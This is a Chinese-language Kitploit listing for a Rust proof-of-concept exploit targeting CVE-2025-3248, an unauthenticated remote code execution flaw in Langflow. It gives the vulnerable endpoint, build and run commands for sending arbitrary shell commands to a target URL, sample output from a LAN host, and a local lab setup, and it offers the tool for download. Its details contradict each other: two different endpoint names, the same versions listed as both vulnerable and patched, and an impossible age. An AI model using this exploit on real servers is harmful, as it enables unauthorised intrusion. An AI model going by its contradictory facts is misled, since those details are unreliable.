Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-3248-POC — 基于 Rust 的概念验证漏洞利用程序,针对 CVE-2025-3248,这是 Langflow 中通过 /api/v1/validate/code 存在的严重未授权远程代码执行漏洞,允许执行任意命令。 | Kitploit
工具/GitHubGitHub/b0ysie7e/cve-2025-3248-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubb0ysie7e/cve-2025-3248-poc

CVE-2025-3248-POC

基于 Rust 的概念验证漏洞利用程序,针对 CVE-2025-3248,这是 Langflow 中通过 /api/v1/validate/code 存在的严重未授权远程代码执行漏洞,允许执行任意命令。

查看仓库
189个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Langflow RCE 漏洞利用 - CVE-2025-3248

⚠️ 免责声明
此代码仅严格用于教育和研究目的。未经明确许可在系统上使用可能构成违法行为。
作者对此工具的任何误用或恶意行为概不负责。


漏洞信息

CVE-2025-3248 - 严重

CVSS 评分:9.8 | EPSS 评分:92.57% | 发布时间:2025 年 5 月 22 日

受影响版本

  • 存在漏洞: 所有版本 ≤ v1.3.0
  • 已修补: v1.3.0 及以上版本

攻击向量

端点 /api/v1/validate/code 接受未经过滤的 Python 代码,并直接使用 exec() 执行,无需身份验证。

漏洞代码

# langflow/api/builder/execute.py
exec(code)  # 无输入验证或沙箱隔离!

技术分析

Langflow 暴露了一个 /api/v1/builder/execute_code 端点,该端点接收用户提供的 Python 代码并将其直接传递给后端的 exec()。由于没有身份验证或沙箱机制,攻击者可以构造任意载荷以执行代码。

执行漏洞利用

要求

  • Rust 1.70+(通过 rustup 安装)
  • Cargo(Rust 包管理器)
# 克隆仓库
git clone <repo-url>
cd CVE-2025-3248-POC

cargo build --release

# ./target/release/CVE-2025-3248-POC
./CVE-2025-3248-POC --url <BASE_URL> --command "<COMMAND>"

示例:

❯ ./target/release/CVE-2025-3248-POC --url 'http://192.168.159.137:7860' --command 'id'
[+] Langflow RCE Exploit - CVE-2025-3248
[+] url :http://192.168.159.137:7860, 
[+] Command: id
Status: 200 OK
uid=1000(user) gid=0(root) groups=0(root)   

本地实验室搭建

快速启动

> cd lab
> sudo docker-compose up -d

> ./target/release/CVE-2025-3248-POC --url 'http://localhost:7860' --command 'whoami'

停止实验室

> sudo docker-compose down
下载工具